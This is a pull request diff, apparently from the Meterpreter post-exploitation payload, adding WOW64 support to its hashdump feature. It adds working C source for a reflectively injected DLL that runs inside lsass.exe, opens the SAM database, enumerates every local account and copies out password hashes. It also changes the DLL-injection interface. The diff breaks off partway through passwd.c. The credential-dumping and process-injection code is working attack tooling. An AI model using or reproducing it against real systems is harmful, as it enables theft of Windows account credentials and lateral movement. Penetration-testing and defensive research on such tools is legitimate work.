### PR TITLE
WOW64 Support for hashdump

### DIFF
--- a/.github/workflows/verify.yml
+++ b/.github/workflows/verify.yml
@@ -22,7 +22,7 @@ jobs:
   mingw:
     runs-on: ubuntu-latest
     timeout-minutes: 40
-    name: Meterpreter C Mingw Docker Build
+    name: Meterpreter MinGW Docker Build
     steps:
       - name: Checkout code
         uses: actions/checkout@v3

--- a/c/meterpreter/Makefile
+++ b/c/meterpreter/Makefile
@@ -21,9 +21,11 @@ meterpreter: meterpreter-x86 meterpreter-x64
 meterpreter-x86: meterpreter-x86-gen meterpreter-x86-build
 
 meterpreter-x86-gen:
+	@cmake -S workspace -B workspace/build/mingw-x64-dump-sam -DBUILD_ALL=OFF -DBUILD_PLG_DUMPSAM=ON $(COMMON_GEN_X64)
 	@cmake -S workspace -B workspace/build/mingw-x86 $(COMMON_GEN_X86)
 
 meterpreter-x86-build:
+	@cmake --build workspace/build/mingw-x64-dump-sam $(COMMON_BUILD)
 	@cmake --build workspace/build/mingw-x86 $(COMMON_BUILD)
 
 meterpreter-x86-clean:
@@ -91,9 +93,11 @@ meterpreter-ext-priv: meterpreter-ext-priv-x86 meterpreter-ext-priv-x64
 meterpreter-ext-priv-x86: meterpreter-ext-priv-x86-gen meterpreter-ext-priv-x86-build
 
 meterpreter-ext-priv-x86-gen:
+	@cmake -S workspace -B workspace/build/mingw-x64-dump-sam -DBUILD_ALL=OFF -DBUILD_PLG_DUMPSAM=ON $(COMMON_GEN_X64)
 	@cmake -S workspace -B workspace/build/mingw-x86-ext-priv -DBUILD_ALL=OFF -DBUILD_EXT_PRIV=ON $(COMMON_GEN_X86)
 
 meterpreter-ext-priv-x86-build:
+	@cmake --build workspace/build/mingw-x64-dump-sam $(COMMON_BUILD)
 	@cmake --build workspace/build/mingw-x86-ext-priv $(COMMON_BUILD)
 
 meterpreter-ext-priv-x64: meterpreter-ext-priv-x64-gen meterpreter-ext-priv-x64-build

--- a/c/meterpreter/README.md
+++ b/c/meterpreter/README.md
@@ -129,7 +129,7 @@ meterpreter source is located. From here you can:
 * Build the x64 version by running: `make x64`
 * Build both x86 and x64 versions by running: `make`
 
-If you want to build binaries with the `v120_xp` toolset instead of `v141_xp` while using VS2017 or VS2019, you must first install VS2013 as shown above. Then, pass `v120_xp` as a parameter when running `make` (eg. `make v120_xp x64`).
+If you want to build binaries with the `v120_xp` toolset instead of `v141_xp` while using VS2017 or VS2019, you must first install VS2013 as shown above. Then, pass `v120_xp` as a parameter when running `make` (eg. `make v120_xp x64`). The Rapid7 build automation uses v120_xp to build the distributed binaries, so projects must build with that platform toolset.
 
 The compiled binaries are written to the `output` folder.
 

--- a/c/meterpreter/source/common/common_metapi.h
+++ b/c/meterpreter/source/common/common_metapi.h
@@ -7,7 +7,7 @@
 
 typedef struct _InjectApi
 {
-	DWORD(*dll)(DWORD dwPid, LPVOID lpDllBuffer, DWORD dwDllLength, LPCSTR reflectiveLoader, char* cpCommandLine);
+	DWORD(*dll)(DWORD dwPid, DWORD dwDestinationArch, LPVOID lpDllBuffer, DWORD dwDllLength, LPCSTR reflectiveLoader, LPVOID lpArg, SIZE_T stArgSize);
 	DWORD(*via_apcthread)(Remote* remote, Packet* response, HANDLE hProcess, DWORD dwProcessID, DWORD dwDestinationArch, LPVOID lpStartAddress, LPVOID lpParameter);
 	DWORD(*via_remotethread)(Remote* remote, Packet* response, HANDLE hProcess, DWORD dwDestinationArch, LPVOID lpStartAddress, LPVOID lpParameter);
 	DWORD(*via_remotethread_wow64)(HANDLE hProcess, LPVOID lpStartAddress, LPVOID lpParameter, HANDLE* pThread);

--- a/c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.c
+++ b/c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.c
@@ -1,0 +1,48 @@
+#include "ReflectiveFreeAndExitThread.h"
+
+typedef NTSTATUS
+(*NtQueueApcThread)(
+    HANDLE    ThreadHandle,
+    PVOID     ApcRoutine,
+    ULONG_PTR SystemArgument1,
+    ULONG_PTR SystemArgument2,
+    ULONG_PTR SystemArgument3
+);
+
+VOID ReflectiveFreeAndExitThread(HINSTANCE hAppInstance, DWORD dwExitCode) {
+    NtQueueApcThread pNtQueueApcThread = (NtQueueApcThread)GetProcAddress(GetModuleHandle(TEXT("ntdll")), "NtQueueApcThread");
+    HANDLE hThread = NULL;
+    HANDLE hThisThread = NULL;
+
+    do {
+        if (!pNtQueueApcThread)
+            break;
+
+        // create a suspended thread that will just exit once the APCs have executed
+        hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ExitThread, 0, CREATE_SUSPENDED, NULL);
+        if (!hThread)
+            break;
+
+        // open a real handle to this thread to pass in the APC so it operates on this thread and not itself
+        hThisThread = OpenThread(THREAD_QUERY_INFORMATION | SYNCHRONIZE, FALSE, GetCurrentThreadId());
+        if (!hThisThread)
+            break;
+
+        // tell that thread to wait on this thread, ensures VirtualFree isn't called until this thread has exited
+        pNtQueueApcThread(hThread, WaitForSingleObjectEx, (ULONG_PTR)hThisThread, INFINITE, FALSE);
+
+        // then close the handle so it's not leaked
+        QueueUserAPC((PAPCFUNC)CloseHandle, hThread, (ULONG_PTR)hThisThread);
+
+        // then free the memory
+        pNtQueueApcThread(hThread, VirtualFree, (ULONG_PTR)hAppInstance, 0, MEM_RELEASE);
+        
+        ResumeThread(hThread);
+    } while (FALSE);
+
+    if (hThread)
+        CloseHandle(hThread);
+
+    ExitThread(dwExitCode);
+    return;
+}

--- a/c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.h
+++ b/c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.h
@@ -1,0 +1,8 @@
+#ifndef _METERPRETER_SOURCE_REFLECTIVE_FREE_AND_EXIT_THREAD_H
+#define _METERPRETER_SOURCE_REFLECTIVE_FREE_AND_EXIT_THREAD_H
+
+#include <windows.h>
+
+VOID ReflectiveFreeAndExitThread(HINSTANCE hAppInstance, DWORD dwExitCode);
+
+#endif

--- a/c/meterpreter/source/dump_sam/dump_sam.c
+++ b/c/meterpreter/source/dump_sam/dump_sam.c
@@ -1,0 +1,304 @@
+#include <stdlib.h>
+#include <stdio.h>
+
+#include "dump_sam.h"
+#include "ReflectiveFreeAndExitThread.h"
+
+#define RDIDLL_NOEXPORT
+#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
+#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
+#include "ReflectiveLoader.c"
+
+
+/*! @brief Sets `dwResult` to the return value of `GetLastError()`, prints debug output, then does `break;` */
+#define BREAK_ON_ERROR( str ) { dwResult = GetLastError(); dprintf( "%s. error=%d (0x%x)", str, dwResult, (ULONG_PTR)dwResult ); break; }
+/*! @brief Sets `dwResult` to `error`, prints debug output, then `break;` */
+#define BREAK_WITH_ERROR( str, err ) { dwResult = err; dprintf( "%s. error=%d (0x%x)", str, dwResult, (ULONG_PTR)dwResult ); break; }
+
+/* Logging will work but only to OutputDebugStringA and not the full on Meterpreter logging because we don't have
+ * access to the API from within lsass.exe (which is where we're running).
+ */
+#ifdef DEBUGTRACE
+#define dprintf(...) real_dprintf(__VA_ARGS__)
+#if DEBUGTRACE == 1
+#define vdprintf dprintf
+#else
+#define vdprintf(...) do{}while(0);
+#endif
+#else
+#define dprintf(...) do{}while(0);
+#define vdprintf(...) do{}while(0);
+#endif
+
+/*!
+ * @brief Output a debug string to the debug console.
+ * @details The function emits debug strings via `OutputDebugStringA`, hence all messages can be viewed
+ *          using Visual Studio's _Output_ window, _DebugView_ from _SysInternals_, or _Windbg_.
+ */
+static _inline void real_dprintf(char* format, ...)
+{
+	va_list args;
+	char buffer[1024];
+	size_t len;
+	_snprintf_s(buffer, sizeof(buffer), sizeof(buffer) - 1, "[%04x] ", GetCurrentThreadId());
+	len = strlen(buffer);
+	va_start(args, format);
+	vsnprintf_s(buffer + len, sizeof(buffer) - len, sizeof(buffer) - len - 3, format, args);
+	strcat_s(buffer, sizeof(buffer), "\r\n");
+	OutputDebugStringA(buffer);
+	va_end(args);
+}
+
+/* Convert a wchar string to a mb string. Chars can be -1 if the string is NULL terminated, otherwise it needs to be the
+ * number of wide characters in the string not including the NULL terminator. The return value is always NULL
+ * terminated.
+ */
+char* wchar_to_utf8(const wchar_t* in, int chars)
+{
+	char* out;
+	int len;
+	HANDLE hHeap = GetProcessHeap();
+
+	if (!in)
+		return NULL;
+
+	len = WideCharToMultiByte(CP_UTF8, 0, in, chars, NULL, 0, NULL, NULL);
+	if (len <= 0)
+		return NULL;
+
+	/* if -1 was passed through to WideCharToMultiByte, there's no need to add for the NULL terminator */
+	out = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, (len * sizeof(char)) + (chars == -1 ? 0 : 1));
+	if (!out)
+		return NULL;
+
+	if (WideCharToMultiByte(CP_UTF8, 0, in, chars, out, len, NULL, FALSE) == 0)
+	{
+		HeapFree(hHeap, 0, out);
+		out = NULL;
+	}
+
+	return out;
+}
+
+/*!
+ * @brief Function that is copied to lsass and run in a separate thread to dump hashes.
+ * @param fargs Collection of arguments containing important information, handles and pointers.
+ * @remark The code in this fuction _must_ be position-independent. No direct calls to functions
+ *         are to be made.
+ */
+DWORD dump_sam(FUNCTIONARGS* fargs)
+{
+	/* variables for samsrv function pointers */
+	HANDLE hSamSrv = NULL, hSam = NULL;
+	SamIConnectType pSamIConnect;
+	SamrOpenDomainType pSamrOpenDomain;
+	SamrEnumerateUsersInDomainType pSamrEnumerateUsersInDomain;
+	SamrOpenUserType pSamrOpenUser;
+	SamrQueryInformationUserType pSamrQueryInformationUser;
+	SamIFree_SAMPR_USER_INFO_BUFFERType pSamIFree_SAMPR_USER_INFO_BUFFER;
+	SamIFree_SAMPR_ENUMERATION_BUFFERType pSamIFree_SAMPR_ENUMERATION_BUFFER;
+	SamrCloseHandleType pSamrCloseHandle;
+
+	/* variables for samsrv functions */
+	HANDLE hEnumerationHandle = NULL, hDomain = NULL, hUser = NULL;
+	SAM_DOMAIN_USER_ENUMERATION* pEnumeratedUsers = NULL;
+	DWORD dwNumberOfUsers = 0;
+	PVOID pvUserInfo = 0;
+
+	/* variables for advapi32 functions */
+	LSA_HANDLE hLSA = NULL;
+	LSA_OBJECT_ATTRIBUTES ObjectAttributes;
+	POLICY_ACCOUNT_DOMAIN_INFO* pAcctDomainInfo = NULL;
+
+	/* general variables */
+	NTSTATUS status;
+	HANDLE hReadLock = NULL, hFreeLock = NULL;
+	DWORD dwUsernameLength = 0, dwCurrentUser = 0, dwStorageIndex = 0;
+	DWORD dwResult = 0;
+	NTSTATUS NtStatus = 0;
+	HANDLE hHeap = GetProcessHeap();
+
+	dprintf("[DUMPSAM] Starting dump");
+
+	do {
+		/* load samsrv functions */
+		hSamSrv = LoadLibrary("samsrv.dll");
+		if (!hSamSrv)
+			BREAK_ON_ERROR("[DUMPSAM] Failed to load samsrv.dll");
+
+		pSamIConnect = (SamIConnectType)GetProcAddress(hSamSrv, "SamIConnect");
+		pSamrOpenDomain = (SamrOpenDomainType)GetProcAddress(hSamSrv, "SamrOpenDomain");
+		pSamrEnumerateUsersInDomain = (SamrEnumerateUsersInDomainType)GetProcAddress(hSamSrv, "SamrEnumerateUsersInDomain");
+		pSamrOpenUser = (SamrOpenUserType)GetProcAddress(hSamSrv, "SamrOpenUser");
+		pSamrQueryInformationUser = (SamrQueryInformationUserType)GetProcAddress(hSamSrv, "SamrQueryInformationUser");
+		pSamIFree_SAMPR_USER_INFO_BUFFER = (SamIFree_SAMPR_USER_INFO_BUFFERType)GetProcAddress(hSamSrv, "SamIFree_SAMPR_USER_INFO_BUFFER");
+		pSamIFree_SAMPR_ENUMERATION_BUFFER = (SamIFree_SAMPR_ENUMERATION_BUFFERType)GetProcAddress(hSamSrv, "SamIFree_SAMPR_ENUMERATION_BUFFER");
+		pSamrCloseHandle = (SamrCloseHandleType)GetProcAddress(hSamSrv, "SamrCloseHandle");
+
+		if (!pSamIConnect || !pSamrOpenDomain || !pSamrEnumerateUsersInDomain || !pSamrOpenUser || !pSamrQueryInformationUser ||
+			!pSamIFree_SAMPR_USER_INFO_BUFFER || !pSamIFree_SAMPR_ENUMERATION_BUFFER || !pSamrCloseHandle)
+		{
+			BREAK_WITH_ERROR("[DUMPSAM] Failed to resolve all required functions", ERROR_NOT_FOUND);
+		}
+
+		/* initialize the LSA_OBJECT_ATTRIBUTES structure */
+		ObjectAttributes.RootDirectory = NULL;
+		ObjectAttributes.ObjectName = NULL;
+		ObjectAttributes.Attributes = 0;
+		ObjectAttributes.SecurityDescriptor = NULL;
+		ObjectAttributes.SecurityQualityOfService = NULL;
+		ObjectAttributes.Length = sizeof(LSA_OBJECT_ATTRIBUTES);
+
+		/* open a handle to the LSA policy */
+		if (NtStatus = LsaOpenPolicy(NULL, &ObjectAttributes, POLICY_ALL_ACCESS, &hLSA) < 0)
+			BREAK_WITH_ERROR("[DUMPSAM] Failed to open a handle to the LSA policy", LsaNtStatusToWinError(NtStatus));
+
+		if (NtStatus = LsaQueryInformationPolicy(hLSA, PolicyAccountDomainInformation, (LPVOID*)&pAcctDomainInfo) < 0)
+			BREAK_WITH_ERROR("[DUMPSAM] Failed to query the LSA policy information", LsaNtStatusToWinError(NtStatus));
+
+		/* connect to the SAM database */
+		if (pSamIConnect(0, &hSam, MAXIMUM_ALLOWED, 1) < 0)
+			BREAK_WITH_ERROR("[DUMPSAM] Failed to connect to the SAM database", ERROR_CAN_NOT_COMPLETE);
+
+		if (pSamrOpenDomain(hSam, 0xf07ff, pAcctDomainInfo->DomainSid, &hDomain) < 0)
+			BREAK_WITH_ERROR("[DUMPSAM] Failed to open the SAM domain", ERROR_CAN_NOT_COMPLETE);
+
+		/* enumerate all users and store username, rid, and hashes */
+		do
+		{
+			status = pSamrEnumerateUsersInDomain(hDomain, &hEnumerationHandle, 0, &pEnumeratedUsers, 0xFFFF, &dwNumberOfUsers);
+			if (status < 0)
+			{
+				break;
+			}	// error
+
+			// 0x0 = no more, 0x105 = more users
+			if (!dwNumberOfUsers)
+			{
+				break;
+			}	// exit if no users remain
+
+			if (fargs->dwDataSize == 0)
+			{	// first allocation
+				fargs->dwDataSize = dwNumberOfUsers * sizeof(USERNAMEHASH);
+				fargs->UsernameHashData.ptr = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, fargs->dwDataSize);
+			}
+			else
+			{	// subsequent allocations
+				fargs->dwDataSize += dwNumberOfUsers * sizeof(USERNAMEHASH);
+				fargs->UsernameHashData.ptr = HeapReAlloc(hHeap, HEAP_ZERO_MEMORY, fargs->UsernameHashData.ptr, fargs->dwDataSize);
+			}
+			if (!fargs->UsernameHashData.ptr)
+				BREAK_WITH_ERROR("[DUMPSAM] Failed to allocate memory", ERROR_NOT_ENOUGH_MEMORY);
+
+			for (dwCurrentUser = 0; dwCurrentUser < dwNumberOfUsers; dwCurrentUser++)
+			{
+
+				if (pSamrOpenUser(hDomain, MAXIMUM_ALLOWED, pEnumeratedUsers->pSamDomainUser[dwCurrentUser].dwUserId, &hUser) < 0)
+					BREAK_WITH_ERROR("[DUMPSAM] Failed to open SAM user", ERROR_CAN_NOT_COMPLETE);
+
+				if (pSamrQueryInformationUser(hUser, SAM_USER_INFO_PASSWORD_OWFS, &pvUserInfo) < 0)
+					BREAK_WITH_ERROR("[DUMPSAM] Failed to query user information", ERROR_CAN_NOT_COMPLETE);
+
+				/* allocate space for another username */
+				LSA_UNICODE_STRING wszUsername = pEnumeratedUsers->pSamDomainUser[dwCurrentUser].wszUsername;
+				(fargs->UsernameHashData.ptr)[dwStorageIndex].Username.ptr = wchar_to_utf8(wszUsername.Buffer, wszUsername.Length / sizeof(WCHAR));
+
+				if ((fargs->UsernameHashData.ptr)[dwStorageIndex].Username.ptr == NULL)
+					BREAK_WITH_ERROR("[DUMPSAM] Failed to encode the username", ERROR_CAN_NOT_COMPLETE);
+
+				dwUsernameLength = (DWORD)strlen((fargs->UsernameHashData.ptr)[dwStorageIndex].Username.ptr);
+				(fargs->UsernameHashData.ptr)[dwStorageIndex].Length = dwUsernameLength;
+				(fargs->UsernameHashData.ptr)[dwStorageIndex].RID = pEnumeratedUsers->pSamDomainUser[dwCurrentUser].dwUserId;
+				memcpy((fargs->UsernameHashData.ptr)[dwStorageIndex].Hash, pvUserInfo, 32);
+
+				/* clean up */
+				pSamIFree_SAMPR_USER_INFO_BUFFER(pvUserInfo, SAM_USER_INFO_PASSWORD_OWFS);
+				pSamrCloseHandle(&hUser);
+				pvUserInfo = 0;
+				hUser = 0;
+
+				/* move to the next storage element */
+				dwStorageIndex++;
+			}
+			pSamIFree_SAMPR_ENUMERATION_BUFFER(pEnumeratedUsers);
+			pEnumeratedUsers = NULL;
+
+		} while (status == 0x105);
+
+		/* set the event to signify that the data is ready */
+		hReadLock = OpenEvent(EVENT_MODIFY_STATE, FALSE, fargs->ReadSyncEvent);
+		if (hReadLock == NULL)
+			BREAK_ON_ERROR("[DUMPSAM] Failed to open the read-lock event");
+
+		/* wait for the copying to finish before freeing all the allocated memory */
+		hFreeLock = OpenEvent(SYNCHRONIZE, FALSE, fargs->FreeSyncEvent);
+		if (hFreeLock == NULL)
+			BREAK_ON_ERROR("[DUMPSAM] Failed to open the free-lock event");
+
+		if (SetEvent(hReadLock) == 0)
+			BREAK_ON_ERROR("[DUMPSAM] Failed to set the read-lock event");
+
+		dwResult = WaitForSingleObject(hFreeLock, fargs->dwMillisecondsToWait);
+		if (dwResult != WAIT_OBJECT_0)
+			BREAK_WITH_ERROR("[DUMPSAM] Failed to wait for the free-lock event to be signaled", dwResult);
+	} while (FALSE);
+
+	dprintf("[DUMPSAM] Cleaning up...");
+
+	/* free all the allocated memory */
+	for (dwCurrentUser = 0; dwCurrentUser < dwStorageIndex; dwCurrentUser++)
+	{
+		HeapFree(hHeap, 0, (fargs->UsernameHashData.ptr)[dwCurrentUser].Username.ptr);
+	}
+	HeapFree(hHeap, 0, fargs->UsernameHashData.ptr);
+
+	/* close all handles */
+	pSamrCloseHandle(&hDomain);
+	pSamrCloseHandle(&hSam);
+	LsaClose(hLSA);
+
+	/* free library handles */
+	if (hSamSrv)
+	{
+		FreeLibrary(hSamSrv);
+	}
+
+	/* signal that the memory deallocation is complete */
+	SetEvent(hReadLock);
+	CloseHandle(hReadLock);
+
+	/* release the free handle */
+	CloseHandle(hFreeLock);
+
+	dprintf("[DUMPSAM] Finished with status: 0x%08x", dwResult);
+
+	dprintf("[DUMPSAM] Calling ReflectiveFreeAndExitThread(0x%p, 0)", hAppInstance);
+	ReflectiveFreeAndExitThread(hAppInstance, 0);
+
+	/* should never reach this point */
+	return 0;
+}
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
+{
+	BOOL bReturnValue = TRUE;
+
+	switch (dwReason)
+	{
+	case DLL_QUERY_HMODULE:
+		if (lpReserved != NULL)
+			*(HMODULE*)lpReserved = hAppInstance;
+		break;
+	case DLL_PROCESS_ATTACH:
+		hAppInstance = hinstDLL;
+		if (lpReserved != NULL)
+			dump_sam((FUNCTIONARGS*)lpReserved);
+		break;
+	case DLL_PROCESS_DETACH:
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+		break;
+	}
+	return bReturnValue;
+}

--- a/c/meterpreter/source/dump_sam/dump_sam.def
+++ b/c/meterpreter/source/dump_sam/dump_sam.def
@@ -1,0 +1,3 @@
+NAME plugin.dll
+EXPORTS
+	ReflectiveLoader @1 NONAME PRIVATE

--- a/c/meterpreter/source/dump_sam/dump_sam.h
+++ b/c/meterpreter/source/dump_sam/dump_sam.h
@@ -1,0 +1,79 @@
+#ifndef _METERPRETER_SOURCE_DUMP_SAM_H
+#define _METERPRETER_SOURCE_DUMP_SAM_H
+
+#define  WIN32_LEAN_AND_MEAN
+#include <windows.h>
+#include <ntsecapi.h>
+
+/*! @brief Define the type of information to retrieve from the SAM. */
+#define SAM_USER_INFO_PASSWORD_OWFS 0x12
+
+/*! @brief Struct that represents a SAM user in Windows. */
+typedef struct _SAM_DOMAIN_USER
+{
+	DWORD               dwUserId;
+	LSA_UNICODE_STRING  wszUsername;
+} SAM_DOMAIN_USER;
+
+/*! @brief Struct that contains SAM user enumeration context. */
+typedef struct _SAM_DOMAIN_USER_ENUMERATION
+{
+	DWORD             dwDomainUserCount;
+	SAM_DOMAIN_USER*  pSamDomainUser;
+} SAM_DOMAIN_USER_ENUMERATION;
+
+/* define types for samsrv */
+typedef LONG	  NTSTATUS;
+typedef NTSTATUS(WINAPI* SamIConnectType)(DWORD, PHANDLE, DWORD, DWORD);
+typedef NTSTATUS(WINAPI* SamrOpenDomainType)(HANDLE, DWORD, PSID, HANDLE*);
+typedef NTSTATUS(WINAPI* SamrOpenUserType)(HANDLE, DWORD, DWORD, HANDLE*);
+typedef NTSTATUS(WINAPI* SamrEnumerateUsersInDomainType)(HANDLE, HANDLE*, DWORD, SAM_DOMAIN_USER_ENUMERATION**, DWORD, DWORD*);
+typedef NTSTATUS(WINAPI* SamrQueryInformationUserType)(HANDLE, DWORD, PVOID);
+typedef VOID(WINAPI* SamIFree_SAMPR_USER_INFO_BUFFERType)(PVOID, DWORD);
+typedef VOID(WINAPI* SamIFree_SAMPR_ENUMERATION_BUFFERType)(PVOID);
+typedef NTSTATUS(WINAPI* SamrCloseHandleType)(HANDLE*);
+
+/* unions are used to ensure that MinGW can correctly calculate the size in WOW64 */
+#define STRUCT_USERNAMEHASH(bits) typedef struct \
+{ \
+	union { \
+		char* __ptr##bits  ptr; \
+		ULONG##bits        ul; \
+	} Username; \
+	DWORD              Length; \
+	DWORD              RID; \
+	char               Hash[32]; \
+} USERNAMEHASH##bits;
+
+#define STRUCT_FUNCTIONARGS(bits) typedef struct \
+{ \
+	/* kernel sync object strings */ \
+	char                             ReadSyncEvent[16]; \
+	char                             FreeSyncEvent[16]; \
+	/* maximum wait time for sync */ \
+	DWORD                            dwMillisecondsToWait; \
+	/* return values */ \
+	DWORD                            dwDataSize; \
+	union { \
+		USERNAMEHASH##bits* __ptr##bits  ptr; \
+		ULONG##bits                      ul; \
+	} UsernameHashData; \
+} FUNCTIONARGS##bits;
+
+STRUCT_USERNAMEHASH(32);
+STRUCT_USERNAMEHASH(64);
+STRUCT_FUNCTIONARGS(32);
+STRUCT_FUNCTIONARGS(64);
+
+#ifdef _WIN64
+typedef USERNAMEHASH64  USERNAMEHASH;
+typedef FUNCTIONARGS64  FUNCTIONARGS;
+#else
+typedef USERNAMEHASH32  USERNAMEHASH;
+typedef FUNCTIONARGS32  FUNCTIONARGS;
+#endif
+
+DWORD dump_sam(FUNCTIONARGS* fargs);
+void dump_sam_end(void);
+
+#endif

--- a/c/meterpreter/source/extensions/priv/afxres.h
+++ b/c/meterpreter/source/extensions/priv/afxres.h
@@ -1,0 +1,23 @@
+#ifndef _AFXRES_H
+#define _AFXRES_H
+#if __GNUC__ >= 3
+#pragma GCC system_header
+#endif
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+#ifndef _WINDOWS_H
+#include <windows.h>
+#endif
+
+/* IDC_STATIC is documented in winuser.h, but not defined. */
+#ifndef IDC_STATIC
+#define IDC_STATIC (-1)
+#endif
+
+#ifdef __cplusplus
+}
+#endif
+#endif

--- a/c/meterpreter/source/extensions/priv/passwd.c
+++ b/c/meterpreter/source/extensions/priv/passwd.c
@@ -3,7 +3,11 @@
  * @brief Functionality for dumping password hashes from lsass.exe.
  */
 #include "precomp.h"
+#include "common.h"
+#include "common_exports.h"
 #include "common_metapi.h"
+#include "resource.h"
+#include "dump_sam.h"
 #include <stdio.h>
 #include <windows.h>
 #include <psapi.h>
@@ -13,131 +17,55 @@
 #include <stdlib.h>
 #include <malloc.h>
 
-/*! @brief Define the type of information to retrieve from the SAM. */
-#define SAM_USER_INFO_PASSWORD_OWFS 0x12
+#define LOADER_ORDINAL(x) ((LPCSTR)x)
 
-/*!
- * @brief Name of the cross-session event name used to sync reads between threads.
- * @remark It is very important that the event is prefixed with "Global\" otherwise it will
- *         not be shared across processes that are in different sessions.
- */
-#define READ_SYNC_EVENT_NAME "Global\\SAM"
-/*!
- * @brief Name of the cross-session event name used to sync resource deallocation between threads.
- * @remark It is very important that the event is prefixed with "Global\" otherwise it will
- *         not be shared across processes that are in different sessions.
- */
-#define FREE_SYNC_EVENT_NAME "Global\\FREE"
+typedef BOOL(WINAPI* ISWOW64PROCESS)(HANDLE, PBOOL);
+typedef ULONG(WINAPI* RTLNTSTATUSTODOSERROR)(NTSTATUS);
+typedef NTSTATUS(NTAPI* NTWOW64READVIRTUALMEMORY64)(HANDLE, ULONG64, PVOID, ULONG64, PULONG64);
 
-/*! @brief Struct that represents a SAM user in Windows. */
-typedef struct _SAM_DOMAIN_USER
+/* returns whether or not lsass.exe is 64-bit */
+BOOL is_lsass64()
 {
-	DWORD				dwUserId;
-	LSA_UNICODE_STRING  wszUsername;
-} SAM_DOMAIN_USER;
+/* lsass.exe will match the host's native architecture so if we're 64-bit we know it too is 64-bit */
+#ifdef _WIN64
+	return TRUE;
+#else
+/* if we're not 64-bit, check if we're running as a 32-bit process on 64-bit windows (WoW64) */
+	BOOL bBool = FALSE;
+	ISWOW64PROCESS pIsWow64Process = (ISWOW64PROCESS)GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "IsWow64Process");
+	if (pIsWow64Process)
+		pIsWow64Process(GetCurrentProcess(), &bBool);
+	return bBool;
+#endif
+}
 
-/*! @brief Struct that contains SAM user enumeration context. */
-typedef struct _SAM_DOMAIN_USER_ENUMERATION
+BOOL ReadProcessMemory64(HANDLE hProcess, ULONG64 lpBaseAddress, LPVOID lpBuffer, ULONG nSize, PULONG64 lpNumberOfBytesRead)
 {
-	DWORD               dwDomainUserCount;
-	SAM_DOMAIN_USER     *pSamDomainUser;
-} SAM_DOMAIN_USER_ENUMERATION;
+	HMODULE hNtdll = GetModuleHandle(TEXT("ntdll.dll"));
+	NTWOW64READVIRTUALMEMORY64 pNtWow64ReadVirtualMemory64 = (NTWOW64READVIRTUALMEMORY64)GetProcAddress(hNtdll, "NtWow64ReadVirtualMemory64");
+	if (!pNtWow64ReadVirtualMemory64)
+	{
+		/* this will only be present in a WOW64 process */
+		SetLastError(ERROR_CALL_NOT_IMPLEMENTED);
+		return FALSE;
+	}
 
-/*! @brief DTO-style object for passing data between Meterpreter and lsass. */
-typedef struct _USERNAMEHASH
-{
-	char	*Username;
-	DWORD	Length;
-	DWORD	RID;
-	char	Hash[32];
-} USERNAMEHASH;
-
-/* define types for kernel32 functions */
-typedef FARPROC (WINAPI *GetProcAddressType)(HMODULE, LPCSTR);
-typedef HMODULE (WINAPI *LoadLibraryType)(LPCSTR);
-typedef BOOL	(WINAPI *FreeLibraryType)(HMODULE);
-typedef HANDLE	(WINAPI *OpenEventType)(DWORD, BOOL, LPCTSTR);
-typedef BOOL	(WINAPI *SetEventType)(HANDLE);
-typedef BOOL	(WINAPI *CloseHandleType)(HANDLE);
-typedef DWORD	(WINAPI *WaitForSingleObjectType)(HANDLE, DWORD);
-
-/*! Container for context that is given to the remote thread executed in lsass.exe. */
-typedef struct
-{
-	/* kernel32 function pointers */
-	LoadLibraryType			LoadLibrary;
-	GetProcAddressType		GetProcAddress;
-	FreeLibraryType			FreeLibrary;
-	OpenEventType			OpenEvent;
-	SetEventType			SetEvent;
-	CloseHandleType			CloseHandle;
-	WaitForSingleObjectType	WaitForSingleObject;
-
-	/* samsrv strings */
-	char samsrvdll[11];
-	char samiconnect[12];
-	char samropendomain[15];
-	char samropenuser[13];
-	char samrqueryinformationuser[25];
-	char samrenumerateusersindomain[27];
-	char samifree_sampr_user_info_buffer[32];
-	char samifree_sampr_enumeration_buffer[34];
-	char samrclosehandle[16];
-
-	/* advapi32 strings */
-	char advapi32dll[13];
-	char lsaopenpolicy[14];
-	char lsaqueryinformationpolicy[26];
-	char lsaclose[9];
-
-	/* msvcrt strings */
-	char msvcrtdll[11];
-	char malloc[7];
-	char realloc[8];
-	char free[5];
-	char memcpy[7];
-
-	/* ntdll strings */
-	char ntdlldll[10];
-	char wcstombs[9];
-
-	/* kernel sync object strings */
-	char ReadSyncEvent[11];
-	char FreeSyncEvent[12];
-
-	/* maximum wait time for sync */
-	DWORD dwMillisecondsToWait;
-
-	/* return values */
-	DWORD			dwDataSize;
-	USERNAMEHASH	*pUsernameHashData;
-
-} FUNCTIONARGS;
-
-/* define types for samsrv */
-typedef LONG	  NTSTATUS;
-typedef NTSTATUS (WINAPI *SamIConnectType)(DWORD, PHANDLE, DWORD, DWORD);
-typedef NTSTATUS (WINAPI *SamrOpenDomainType)(HANDLE, DWORD, PSID, HANDLE *);
-typedef NTSTATUS (WINAPI *SamrOpenUserType)(HANDLE, DWORD, DWORD, HANDLE *);
-typedef NTSTATUS (WINAPI *SamrEnumerateUsersInDomainType)(HANDLE, HANDLE *, DWORD, SAM_DOMAIN_USER_ENUMERATION **, DWORD, DWORD *);
-typedef NTSTATUS (WINAPI *SamrQueryInformationUserType)(HANDLE, DWORD, PVOID);
-typedef VOID	 (WINAPI *SamIFree_SAMPR_USER_INFO_BUFFERType)(PVOID, DWORD);
-typedef VOID	 (WINAPI *SamIFree_SAMPR_ENUMERATION_BUFFERType)(PVOID);
-typedef NTSTATUS (WINAPI *SamrCloseHandleType)(HANDLE *);
-
-/* define types for advapi32 */
-typedef NTSTATUS (WINAPI *LsaOpenPolicyType)(PLSA_UNICODE_STRING, PLSA_OBJECT_ATTRIBUTES, ACCESS_MASK, PLSA_HANDLE);
-typedef	NTSTATUS (WINAPI *LsaQueryInformationPolicyType)(LSA_HANDLE, POLICY_INFORMATION_CLASS, PVOID *);
